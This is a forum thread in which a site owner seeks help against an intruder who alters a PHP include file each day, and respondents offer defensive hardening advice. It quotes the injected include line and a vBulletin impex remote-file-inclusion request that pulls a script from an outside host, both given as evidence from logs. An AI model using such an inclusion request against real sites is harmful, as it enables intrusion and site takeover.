Very Very experienced PHP programmer , HELP needed
 

heres the situation.

Index.php file has include to _header.php file.

Some little shit, keeps hacking the site, and changing the code into the header.php file, which sets off a redirect.

Passwords are changed daily. !! Tried from 3 p.c.'s inc brand new clean pc.

Still the prick gets in and hacks the site.

Heres what I want to do, but I dont know how to do it.
We want to track modified pages and capture IP. on the fly.

No point tracking IP of page file access, as the site gets + 1 million hits per day !!!
So we need to instill a tracker of sorts, that immediately notifies us of FTP change, to the particular file.
Obviously the little twat doing this could be going via proxy. We have changed permissions till the cows come home.

I am at my wits end !

Not sure if there are other ways of protection, would changing the site to https make any difference?
Changing htaccess ?
have considered sitting the file on A N Other server, with read only access.. but not sure if that will jeopardise rank.

We have Google involved, also DMCA and a lawyer, as we know who is doing it !!! thats the pisser !!! .... but cannot prevent him doing it !

So any really really good programmers, know any suggestions, would really appreciate your help.

Re: Very Very experienced PHP programmer , HELP needed
 

I'm not experienced enough to help you with this particular issue, but you might want to try posting on www.phpexpertsforum.com - i've had some good help from there.

Re: Very Very experienced PHP programmer , HELP needed
 

Sorry I can't help, but...

Intriguing...! You know who it is, but can't prevent it...? A competitor...? Send the boys around...!

Re: Very Very experienced PHP programmer , HELP needed
 

Have contacted a few friends in the trade, and none really know of a solution. Will look at the phpexperts site, have also posted this on other forums, looking for some assistance... who knows :unsure:

They are based in USA. We managed to get them banned on Google Adsense, and a few other well known ad publishers... but this issue has been going on for 2 years ! In one form or another !!!

Re: Very Very experienced PHP programmer , HELP needed
 

Just asked our coder. He said ...
:)

Re: Very Very experienced PHP programmer , HELP needed
 

This is a really interesting issue, particularly when you know who is doing it... I'm going to ask around a couple of php techheads - if i come up with anything I'll let you know!

Re: Very Very experienced PHP programmer , HELP needed
 

Is the server secure as they may be using some other account to get in. Typically its forum or calendar software that has the bug, and allows for file injection. Check you version of each module used, and check apache logs for uploads featuring the file name.

Perhaps have the include file outside of apache space. i.e.

if your directory setup is /home/user/public_html , then bung the include in a directory like /home/user/include so that there is no html access to it.

Re: Very Very experienced PHP programmer , HELP needed
 

The issue, as I see it with restricting the file in htaccess is that the file needs to be accessed, sitewide, as its an include?
Now im presuming that since the dickhead has access to the "_header.php" file, he also has full access to the rest of the site.

This is in itself, fact.. cos the dickhead, stole our entire mysql databases, which are literally gigantic.
Im not sure what sftp means?

if the file is .php then, there is not http access to the file anyway is there?
( from php source code view )


The reason we know , who is doing it, because its been a 24 month battle !
We dont actually know physical name and address.

The hosting company, is on MUTE , they just ignore us.
If we were in America it would be adifferent matter, but then we'd probs be being hacked from Oz then lolol

I think in essence my query, is that we need actual proof of catching him hacking, by IP CAPTURE and logs.
We can prove he has our stuff.
We can demonstrate he has copied 15,000 pages of the website, we can even prove the scripts he is using are direct cloned copies right down to watermarked images we use, which still bear our complete logo !

What we cannot do at the moment, is catch him in the act.
Albeit each day, this particular file has been changed, and we are off playing silly buggers again.

The problem is he does it at about 2-2:30 am AEST. Which means we dont actually discover it till about 5am+

So yep, my ideology is to somehow, capture his IP, doing what he does, add this to lawsuit, and then use this to ban his ip range. ( albeit his IP is probably floating !!! )

Ste

Re: Very Very experienced PHP programmer , HELP needed
 

The only thing he could have done is to have set up a cron to change the file, on a daily basis? I highly expect that this is possible.

The annoying thing is.... and this is the killer.

One of his hacks, points our site ( top of header file ) to a non existant file on server. So as the site gets re-indexed, then it throws up an incomplete XML sitemap scan. Obviously cannot spider entire site.

Now because he has EXACT clone of our site, his site instantly gets re-indexed in all of our keyword positions !

Imagine that !! How fkn annoying is that huh !

Fortunately, our google rep, was kind enough to do some trackbacks, and look at cached codes etc.. and discovered the issue. They immediately, banned the site ( from adsense ) but cannot ban him from the search engine.

Albeit, for 4 days of the week, his site appears Sandboxed !

My concern is, I think his next move will be to drop a google bomb script on our server !!

Grrrrrr

Re: Very Very experienced PHP programmer , HELP needed
 

Change the php include path, and move the include file to another directory ( unless the dir is hardcoded )

Perhaps you could then track the access to original un-used file

Re: Very Very experienced PHP programmer , HELP needed
 

Wouldnt that tho, track every access to that file? which is about 1 to the power 9 per day lol ?

Re: Very Very experienced PHP programmer , HELP needed
 

Strange to have the database as well as they normally have a different user/password unless the root account is hacked.

I guess the hack solution is 5 min cron job that checks the file, if changed replace the original back, alert you.

Has the replaced file got the same owner as the account ? If your app doesn't have any upload modules then it sounds like the server is compromised. Mine was the other day with an irc, and two fake httpd processes mailing spam. ( check /tmp dir for extra code ). Took me ages in the apache logs for all the domains to find where it was being uploaded.

Re: Very Very experienced PHP programmer , HELP needed
 

the hack is : <? include ("/dev/shm/_global.php"); ?>

Which does not exist.

However somehow today, when we discovered it, it redirected the site to:
http://webfetti.smileycentral.com/do...r=XXXXXXX=true

The Partner ID I have removed whilst we hear back from Fun Web Products, as to who the owner is, as I have a feeling it could be the hacker !

Sheesh...

Will sit down with eldest a little later when he is back, and go thru all the files we can ( that are possible issues )

Takes us ages too.. we usually work on the rule of thumb, pick the 1st loaded file, and work backwards.

We had a ebay / paypal doobery ( wont swear ) uploaded to a server couple of years ago, and caused no end of problems, fortunately the Police intervened, and was someone in the USA ! so wondering if its one and the same.

Re: Very Very experienced PHP programmer , HELP needed
 

Secure File Transfer Protocol http://en.wikipedia.org/wiki/SSH_fil...ol#SFTP_client

I had to convert as mine was hacked too :mad:

Re: Very Very experienced PHP programmer , HELP needed
 

You on a linux box, what permissions are the file.

If done correctly apache runs as web or nobody and this user should not be able to edit your files.

changing to https probably won't make a difference.

You can PM me if you like, worked on apache support a while ago, if it's a windows box then you deserve to get hacked lol

Re: Very Very experienced PHP programmer , HELP needed
 

Infuriating isnt it !!! Okies, with ya now, SSH. I think he uses Putty to do it, I never get that invloved.. but will be learning fast !!!

Yer its Linux. Running Apache.
I cant see how this person has access, its baffling us. Unless theres a backdoor route in.

Son is the coding whizzkid.. so will ask him when he gets in, and see what the go is. Im pretty sure, somehow and somewhere there is some security compromise, within our own code... its like finding a needle in a haystack.

Will report back, cheers mate

Re: Very Very experienced PHP programmer , HELP needed
 

If you make sure only root can write to the files it should be sorted.

Re: Very Very experienced PHP programmer , HELP needed
 

Putty *is* an ssh implementation. IIRC sftp is a separate application from Putty or Unix-based ssh applications.

You might get better answers if you post this in The Lab, where all the geeks hang out. Including me. :o

Re: Very Very experienced PHP programmer , HELP needed
 

Will do !!! Just prefer familiarity :)

Do ya mean file permissions , as in 644 777 etc?

Re: Very Very experienced PHP programmer , HELP needed
 

Yep but not 777!
public should only have read access to the files.

Re: Very Very experienced PHP programmer , HELP needed
 

Yer we have all files and permissions set appropriately.

The header.php file is actually set to 644 !

Then each day, its back to 777 ! ( yet after doing initial permission changes, we check and 644 it is )

Go figure...someones being very very norty !

Re: Very Very experienced PHP programmer , HELP needed
 

who owns the file? And who does apache run as ?

Re: Very Very experienced PHP programmer , HELP needed
 

we do

Re: Very Very experienced PHP programmer , HELP needed
 

What user? The user that apache runs as shouldn't be able to change the file.

Re: Very Very experienced PHP programmer , HELP needed
 

Now im somehwat lost. lol

If we go in via ftp, using root user and root pass, we can modify any file.

Have we got access permissions wrong? :confused:

Re: Very Very experienced PHP programmer , HELP needed
 

not sure :)

Basically when you start apache it forks child process that actually process the requests from the outside world. There is a setting in your httpd.conf file that sets the user to fork the processes as, it's normally nobody.
Nobody should not be able to do anything other then read files. That way if there is a hole in apache the hacker could only be in as nobody and not be able to do much damage.

I don't think they have your root password or they would do more then change the header :)

Re: Very Very experienced PHP programmer , HELP needed
 

Okies... starting to make sense..

Will check httpd files !!

Re: Very Very experienced PHP programmer , HELP needed
 

Restart apache, and make sure that all httpd process have the new/later start time and that they are running as nobody.

do netstat -a and see what comms is there incase there is a perm comms backdoor into the box

Re: Very Very experienced PHP programmer , HELP needed
 

Gonna do just that, speaking with Tech at Host Co. at mo.. gonna tell them what you and Merlin have suggested.

Respect ! ^5 to both of yas ( well everyone ;) thanks )

Re: Very Very experienced PHP programmer , HELP needed
 

Any joy with your problem? Had some advice from a mate which is below...

DO you have root access to the server? If so you could install
mod_security for apache, as that should be able detect any intrusions
and block/alert you about them.

If you keep changing the password then it is unlikely he is getting in
that way, he's probably exploiting some weakness in a script to do a
code or sql injection.

- Check that all your sql queries that use user data are being escaped
with mysql_escape_string().

- Check if you are using any exec() functions in the PHP code, and if so
that there is no possibility for a user to insert a string into these
functions.

You could pay someone like security metrics
https://www.securitymetrics.com/ about $100 to do a regular automated
security sweep of your server. They will look for vulnerabilities and
alert you of them.


HTH

Re: Very Very experienced PHP programmer , HELP needed
 

Gday Ridds.

We are still unsure as to the vulnerability, and route in !
I will copy and paste this to , my Lad.

We will try and see if there are any such compromises, and re code it appropriately.

Because of the sheer size of the site, its gonna be painstaking work.. but gotta be done !!!

Many thanks, have sent you K

Will report back ASAP

Re: Very Very experienced PHP programmer , HELP needed
 

This is from a damage limitation point of view but you could try the following for a short period of time (unless the site needs specific access 24x7).

1. Block all traffic for a given time (say a window of 5 mins from 2.20am to 2.25am), if the change is at the same time each night.

2. Capture all IP addresses for thay time period to narrow down then compare over say 3 days, may narrow down unless its floating or masked.

3. Replace the amended file with a good backup copy each night for a period of time (from a scheduled event), they may get bored and leave you alone if its not working for them.

Just hope they don't come to me and my web enabled SharePoint sites....ahhhh!
Good luck hunting and frying the little sods.

Re: Very Very experienced PHP programmer , HELP needed
 

Read http://en.wikipedia.org/wiki/Code_injection

Check all eval, system ,exec , require calls

If you have other modules, search the web for known hacks.

I've had several forum hacks and deletions over the years.

Last one was vbulletin impex hack which they uploaded hacking scripts

impex/ImpExController.php?systempath=http%3A%2F%2Fmusicr ox1.altervista.org%2Frmod.txt%3F&act=f&f=general.p l&ft=edit&d=%2Ftmp%2F.ICE-unix

Tracing the logs for 'general' and then deleting the impex code ( only used for forum import ) was the solution, but it took a week of fighting the hacker and finding the upload point.

Re: Very Very experienced PHP programmer , HELP needed
 

That would make sense, as most of the day, Aussie time, AEST traffic is at about 100-250 users online.
Couldnt do it at 2am AEST , as this is busiest period. And theres usually about 800+ users online. Which is USA time, and when the prick is doing his bit.

Good lateral thinking tho !!!!

We have had compromises in the past, and VB was a major issue. So too on another site, was an Ecommerce script that we used.
Im not sure, but since we migrated to a diff server, the security issues have worsened.

There is a small forum on the site, but this has only been done recently, and albeit its VB it could be an issue. I will do some checks.

Somehow, I reckon its a SQL issue... not sure on that or the implications, but other than the httpd conf possibility, its my only "guestimate"

If only we could run a trace on the IP that changed the file !!!
ANother issue is logging, this is set to off, as the site currently uses about 5 gig a day in bandwidth !! So the logs would actually bust ftp/php/ and mysql.

We used to run logs, but the files were just bloody enormous. At approx 1 mill page views per day, and approx 150,000 uniques for a non forum based site, actually pinpointing (globally ) the issue is quite daunting !!!

Hence i figured, HELL.. lets whack a sniffer on the server ( somehow ) that alerts us, when a file is actually changed via FTP.

Have searched Google, but to no avail.... still no luck on other forums :(

Re: Very Very experienced PHP programmer , HELP needed
 

Easy enough to write a little shell/perl script that loops around every 30 seconds and emails you when the date on the file changes, and perhaps replaced the file back, but thats no going to track the offender.

Def check for vb , and calender scripts as they are a major source of hacks. Delete or rename the impex directory in vb if you still have it.

Re: Very Very experienced PHP programmer , HELP needed
 

Which Linux distribution and version are you running?

Which versions of Apache and PHP?

Also, a look at the php.ini and the Apache config files could help us track down any security issues.

Does the hosted environment provide any pre-installed CGI or web utilities, such as formmail? Some of these are known to be insecure.

If the _header.php file is changing on a daily basis, I strongly suspect that the attacker has a scheduled scripted exploit running from *his* server. Does the hacked file show a modified date/time? If so, is the time consistent from day to day?

And, further to a previous posters question, what user is the Apache webserver running as? This user should only have read access to _header.php.

Re: Very Very experienced PHP programmer , HELP needed
 

Do you have access to the servers APACHE logs?

if you know where he is coming from you can trace back through the log files (takes ages, been there done that) this mght give you extra information on where he is coming from and what he is calling assuming you have his IP address or similar. If you want me to give a hand PM us.

Re: Very Very experienced PHP programmer , HELP needed
 

Thanks for the replies...

Its all a bit beyond me !!! and thats the truth.

Its my sons site, and he has done all hard coding. My limits stretch to setting up mysql, basic php, and file permissions.

Regarding apache/httpd etc its a tad beyond my knowledge and comfort zone.

.... will post back the info ASAP thankyou

Re: Very Very experienced PHP programmer , HELP needed
 

Let us know what the end result is. :)

Re: Very Very experienced PHP programmer , HELP needed
 

Any news? Or are you and your son both still knee-deep in code? :)